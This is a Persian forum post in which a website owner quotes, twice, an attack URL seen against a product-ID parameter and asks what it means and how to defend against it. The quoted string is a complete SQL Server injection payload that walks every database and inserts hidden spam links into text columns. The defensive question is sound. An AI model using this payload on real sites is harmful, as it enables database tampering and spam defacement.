atarodi
دوشنبه 28 دی 1394, 12:59 عصر
سلام. من جدیدا احساس می کنم یک نفر می خواد داخل سایتم خرابکاری کنه. به این صورت که در یکی از صفحات پارامتری که نوع پارامتر اون را از نوع int مشخص کرده ام یک نفر دستور زیر رو وارد می کنه. معنای این دستور چیه و چی کار می خواد بکنه؟ و چه راههای برای مقابله با اون وجود دارد؟
http://www.mywebsite.ir/ShopDetails.aspx?productID=7617';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%2510 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''discount prescription drug card ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.photo4me.com''+ch ar(47)+''coupons"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%253 when 0 then ''''open'''' when 1 then ''''link'''' else ''''link'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' walgreens online photo''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%25varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
http://www.mywebsite.ir/ShopDetails.aspx?productID=7617';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%2510 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''discount prescription drug card ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.photo4me.com''+ch ar(47)+''coupons"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%253 when 0 then ''''open'''' when 1 then ''''link'''' else ''''link'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' walgreens online photo''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%25varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--